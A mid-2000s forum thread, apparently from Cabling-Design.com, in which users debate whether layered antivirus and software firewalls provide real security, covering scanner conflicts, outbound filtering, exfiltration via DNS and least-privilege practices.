"People think that putting one AV engine after another is somehow defense in depth. They think that if one engine doesn't catch the worm, the other will catch it," he said. "You haven't decreased your attack surface; you've increased it because every AV engine has bugs"
Although attackers have exploited parsing bugs in browsers for years now with some success, Zoller believes that because antivirus software runs everywhere and often with greater administrative rights than the browser, these flaws could lead to even greater problems in the future.
The bottom line, he says, is that antivirus software is broken. "One e-mail and boom, you're gone," he said.
Zoller says he has been criticized by his peers in the security industry for "questioning the very glue that holds IT security all together," but he believes that by bringing this issue to the forefront, the industry will be forced to address a very real security problem.
Kayman added these comments in the current discussion du jour ...
I don't think anyone thinks that having more than one true AV utility running at a time is a good idea. But, what I listed running all the time, eTrust Pest Patrol, commercial Zone Alarm, and NAV 2006 are all intended to do different things in different ways. And, running Ad-Aware and Spy Bot Search & Destroy as separate utilities periodically do yet another security-related purpose. So, I see no conflicts here.
Now, as to one malware scanner finding things another misses, I don't think this is uncommon or unexpected behavior as the creation of definitions to detect new threats is not done in tandem with other developers and different specific utilities perform in entirely different ways.
Interesting. What there's a "death" of, IMO, is people who're aware enough to pay attention to safe computing and have at least a modicum of defenses against the bad guys. The popular malware utilities will catch the vast majority of common threats but if one's PC is attacked by a sophisticated enough hacker or whatever, it is doubtful that any software will catch it.
The problem is only that you are running the security software on the infected machine. If you have got malware which runs with Administrator privileges you cannot rely on anything in your system anymore. It may have installed a good root kit which goes undetected. It may patch the signatures of your security software to go undetected. It can effectively disable your firewall even though the firewall and Windows still think it is running
Thus, if you have an infected machine you simply cannot tell how bad it is. Once you have a trojan on your computer which allows remote access to your computer you are well off the standard malware which you'll find in the wild and which security software may detect. And as some people are more then happy to clean the computer "as good as possible" (or until none of the security software finds more) you can never tell what goes undetected on a computer if you check it on the same system. You should never trust a security check which is running on the infected system. If you want to scan you should use a clean boot disk and scan the file system from there or run a full comparison of the compromised file system with a clean backup to see what has been modified. That would give you more trustworthy results although even then I would rather recommend to restore a clean system image.
There is a lot out there which no malware scanner finds or will ever find. They find what you can find very often. A malware which only appears a few hundred or thousand times, for instance for a little bot net, is unlikely to be found ever. And even if eventually the code is sent to a security company for analysis and is added to their signatures, you can as well just recompile the malware with some code obfuscation and it goes undetected again.
Exactly that's why you cannot trust a infected system with whatever security scanner you may scan it. I will never understand why some people still use the same computer with the same system after 20 different scanners found a dozen different trojans, worms, viruses, etc. They use various removal tools and continue to use the computer after the next scan does not report anything anymore...
But that is what people do when they think a malware infection is simply inevitable eventually if you connect your computer to the internet.
I keep hearing this 'fact' about outgoing messages having to be checked by a firewall, but, though I see the logic behind it, I'm not entirely convinced. After all, if a virus is smart enough to penetrate the incoming firewall, don't you think it will be smart enough to penetrate the outgoing firewall? Say by pretending it is a legitimate windows process (like MSFT Update) and then tricking the user into approving of it? I think so.
Two software firewalls may be a no-no, but I have three antivirus and spyware programs (AVG AntiSpyware, Kaspersky Antivirus, and Webroot) and they all happily play nicely together, with the most obnoxious of the three programs being Kaspersky (the "heuristics" is a pain), followed by Webroot (has given false positives in the past, though the company is good at correcting these mistakes) and AVG (works so nice, with no problems, that I sometimes wonder if it's doing anything at all, since I've seen ads saying that of all the vendors AVG products miss the most viruses, but when scanning your system AVG finds tracking cookies that the other two programs miss). Also Blacklight's free online Windows Explorer ActiveX product has found tracking cookies that all three of the above programs have missed.
Conflict(s) is/are not the issue; The OS may appear working smoothly. But installing anti-whatever applications has made your OS more vulnerable to attacks.
It is important that administrators follow the rule of least privilege. This means that users should operate their computer with only the minimum set of privileges that they need to do their job
The best denfenses are:
Do not work as administrator, use limtited user account (LUA) for day-to-day work.
Keep your system (and all software on it) patched.
Review usage of IE and OE; Look for good alternatives.
Don't expose services to public networks.
Routinely practice safe-hex.
Backup, backup, backup.
The least preferred defenses are: Most popular anti-whatever applications.
I use to have Norton anti-virus and firewall and it caused nothing but problems and is a resource hog. I eventually removed it, and glad I did. I now use AVG for my anti-virus along with A-Squared and Spybot for malware removable, and Comodo for my firewall, all of which are free and I haven't had a problem since.
I forgot to mention that if you decide to remove Norton remember to uninstall Live Update and you also need to go to Norton's site (Symantec) for their removal utility. Your computer should run alot faster without it.
Not true. Conflicts between two on-access scanners are a very real issue and are indeed the main argument against installing concurring scanners. Also, installing applications does not necessarily make an OS more vulnerable. The OS only becomes more vulnerable if some application has an exploitable bug. Of course installing additional software does increase the chance of that happening, but it doesn't automagically make the OS (more) vulnerable.
For example: you can easily run two or more on-demand virus scanners without a single problem, because they're running as simple userspace applications (and thus won't affect each other), and only run with the privileges of the user initiating the scan.
However, that doesn't mean that it'd be okay to install arbitrary AV software, because several of them have issues aside from what I mentioned above.
It doesn't need to be a virus. I did encounter that one time when accessing a web page unexpectedly triggered OE and the firewall blocked it. A firewall may have the ability to block -any- application from sending email without explicit approval. Monitoring outbound traffic also entails differentiating the legitimate processes from suspicious ones or spoofs. All firewalls are not equal, but if the firewall is doing the job well it's not enough for a process to pretend to be "iexplore.exe" in order to pass the firewall, it has to be c:\\program files\\internet explorer\\iexplore.exe, with additional identifying information, be it a specific version number, CRC etc. etc..
Viruses aren't smart, they're all constrained to operating within specific program parameters. Some are more cleverly written than others but the vast majority have already been beaten.
Anyway this thread seems to be missing the point. It's analagous to saying that we shouldn't bother using crosswalks or crossing at the lights because it is always possible that some idiot driver might ignore the signals and run us down anyway. One side (anti-security) says avoid the problem by never crossing a street, the other side (pro-security) says use due caution and cross with the lights. I use a firewall mainly to keep unauthorised -people- out of my PC, AV and AS software to keep out or kill malicious software.
Actually I think it's more akin to birth than death. The major problems are most always for the newbies who haven't yet been educated, have been mis-educated, or simply kept in the background by people purposely talking over their heads when they do try to learn.
An entirely possible set of events, yes. But there are other avenues onto a system than always in-bound and alone through the 'net ports. One example is being invited in: there's a program or 5 out there that will let you use smilies wherever you want to use them; Word, IE, Wordpad, most any application. Yahoo carries it as a link. Lots of newbies think Yahoo is pretty danged neat and go ahead and download it. I forget what it's called and it is pretty neat at first, but then the machine starts to slow down and you keep noticing lots of downloads coming into your machine. If the firewall see is, they allow it because it's a familiar name and has to do with the app they just downloaded, claiming to be its updates. Only the "updates" never stop. It's the GAIN spyware though it goes by several different names. It's a PIA to remove and even their remove instructions, of course, don't fully work. I found it on the client's machine quickly with a malware scan.
Another possibility is a disk from a friend or acquaintance. It may or may not get scanned by a newbie. If it's only spyware it covertly contains, AV won't catch a problem. Not all spyware detectors will find it right away so if all you use is say Windows Defender, there's a good chance you're not going to catch it, if you did bother to scan it. So, it starts calling home and guess what? You have spyware being downloaded into your machine, small pieces at at time until ... .
There's another side of this discussion too I'd like to mention. It seems a lot of the posts have begun to concentrate on the really miserable malware out there that's actually seldom seen by the normal user. Rather than discuss the generally relevant information in addition to the tough ones, they are contentrating on the tough ones as though they are all that exist. It appears to me to be more an attempt to display inflated egos than to impart any useful information to the masses and is dangerously close to being trolling in more than one of the posters; the others are just being sucked into endless discussions, the signature responses trolls hope for.
That's a reasonable arsenal you have, IMO with the exception of possibly Webroot, which I've only read about but don't have any actual experience with. Heuristics, for what it's worth, IS good, but by its nature very prone to false positives; better a false positive than a false negative. The user should be fairly savvy and understand what is causing the hits with heuristics or it can create a sense of worry that's totally unnecessary. Heuristics is simply watching for virus-like activity, unable to know whether it's legitimate accesses due to a user's programs or viral activity, so it notifies the user each time. Cookies, IMO I don't worry too much about. I only keep a few of them on my machine that I need for certain web site password, fast signongs etc and delete everything else. I use WinPatrol for that but for a lot of other things unrelated, too.
Which means again you went to that web page to start with. It was your action which brought you there.
Still, any application can send email without explicit approval if it really wants to. That's the point which is usually not mentioned.
An what keeps the malware from using the original IE to send out its data?
Yes. But that's all. A single little bit cleverer malware sends out your credit card number through DNS. Your firewall does not help. It does not recognize it. You still need more effective means to protect your data which no security suite can provide.
No. That is the wrong analogy. Noone ever said you can never cross the street.
You say you have to install security firewall, i.e. you have to cross the street with the security installed, i.e. at the lights. You must not cross the street at any other place (i.e. without security) because you will be killed, i.e. it is impossible to cross the street at any other place except at the lights.
Others say, this is not true. You don't need the security software. You can cross the street wherever you want. The traffic lights won't prevent you from being killed if all you do is to cross the street at the lights and never looking to the right or left. If you just start to walk when it's green you'll be eventually killed. There are a lot of nice drivers who stop at their red light but eventually you'll meet the one who does not.
The alternative is not to rely on the lights. Don't trust the lights. The effective security is to switch on your brain and protect yourself looking to the left and right and making sure yourself it is safe to cross the street at this time and at this place. This effectively protects you far better than relying on some software which tries to make the decision for you when it is safe to cross and when not.
And once you have learned how to cross the streets safely at any place you'll figure that you don't really need the lights as they only slow down your computer. Then you'll see that there is no MUST to use a security software as there are other far more efficient means to protect you. Then you'll see that all those people you think they MUST cross at the lights tend to turn off their brains because everybody else does the same and they'll never think about what they could do to protect themselves as it is "too complicated" or because everybody says "it is not possible otherwise".
That's the correct analogy if you want to use the "lights". Noone ever said you cannot cross the street. On the contrary. (I already know how you will now adjust your analogy but...)
Anything that comes on to your computer first of all got there because of your action, i.e. your "invitation". But none of the security suites really deals with this fact nor
Yes of course! Utilizing more than one (1) real-time anti-virus scanning engine most likely will cause conflicts; I didn't mean to suggest otherwise. I was trying to emphasise that additional software such as on-demand av/a-s and other anti-whatever apps. are not causing noticable conflicts per se. Sorry for confusion.
Normal usage of the computer for browsing, yes. Staying off of the internet is almost certainly the best way to avoid trouble but that's just a tad self defeating.
In your preferred setup nothing prevents emails from being sent. With an appropriate firewall the firewall can block emails from being sent without user intervention.
In your setup nothing, with many firewalls nothing as well, however there are firewalls which do monitor all processes that try to start other processes.
You're basing your argument on a hypothetical malware and deficient AV and firewall apps. Sorry, that strawman logic doesn't work. One of the reasons for monitoring outbound traffic is precisely to stop unrecognized processes from making connections, either to the internet or to other nodes on a LAN. Firewall X might do this better than Firewall Y, Firewall Z might not do it at all. Y may not be as good a firewall as X but it is still better than Z, and even Z is better than nothing at all.
I never suggested certainty. The whole computer security issue is about probabilities. There is a greater probability of being hit by traffic if you don't use the crosswalks just as there is a greater probability of falling victim to malware if you don't use security software.
Drivers do so love aggressive j-walkers... so many bonus points.
You just described using due caution.
There's no need to adjust my analogy. You haven't yet made a compelling argument in favour of your position.. and I doubt that accident statistics will support your contentions either. :)
The user's mail client is allowed to send mail. %OTHER_PROGRAM% utilizes the user's mail client to send mail. How does the firewall prevent that?
No, trying to intercept IPC and then let the user decide is not an option, because that kind of decision is *way* over a normal user's head.
There's exactly no need at all to do that. Software Restriction Policies already allow to define which programs may or may not be executed.
Instead of restricting the communication of unrecognized processes you want to prevent unrecognized processes from being started in the first place. That's what AV software and SRP do.
Wrong, because this neglects the existence of exploitable bugs and design flaws in the firewall software as well as the possibility of intelligent malware.
No. Computer security is about reliability. Which may very well be based on probabilities, but only if you have some hard numbers. Which numbers are the probabilities you're talking about based on?
I'll never understand why many people also jump to the "stay of the internet". No one said so. It is your conclusion that it is inevitable to come to such "bad" web pages. And that is simply not true. You can browse the internet and with still avoid most of those pages.
Yes. The firewall may be able to block emails from send with OE without user intervention.
It cannot prevent some malware to put some mails into the outbox which is send out the next time the user sends something out.
And it cannot prevent some malware sending out e-mail or other data bypassing the firewall. If you want to get something out you'll get it out even with the firewall in place.
Many people have a browser running at all times. You don't need to start a process. You just have to make the other process do what you want. That's not so awfully difficult.
Again. IE, OE, and other installed applications on your computer are not unrecognized processes. ping for example is a standard application. You can simply enter
And here goes your credit card... You'll never notice. At the same time you run another process which you let get caught by the firewall to make the user think it is all safe and he can continue...
I don't have to use unrecognized processes to send data.
And even "unrecognized processes" can trick the firewall.
Good at blocking software you have installed and use to communicate: yes.
Good at blocking malware effectively: no.
This is just plain wrong. I am far more safe if I open my eyes and make sure that it is safe to cross the street then to rely on traffic lights.
Thus, why would you tell everybody to use the lights and it is absolutely essential to use the lights when there is a far more effective and safer method?
Which is far more effective security.
You started that analogy. I did not adjust it. You described it wrong.
The goal was to cross the street.
You use security software as aid just like traffic lights are a aid for that.
I say you don't need the lights. You don't need the security software.
It is useless to discuss your analogy if you want the analogy to be that not using security software equals not crossing the street. Because you mix the aim with the tool which is supposed to help.
Yes. If a person refuses to learn about security. If a person thinks it only has to install a software suite to protect your computer. If a person thinks with security suite in place everything is done which one can possibly do to have security. If someone wants to dig in the dirt he'll get dirty. If you are concerned about the security of your computer and data you'll learn rules how to keep secure.
Cabling-Design.com Forums website is not affiliated with any of the manufacturers or service providers discussed here.
All logos and trade names are the property of their respective owners.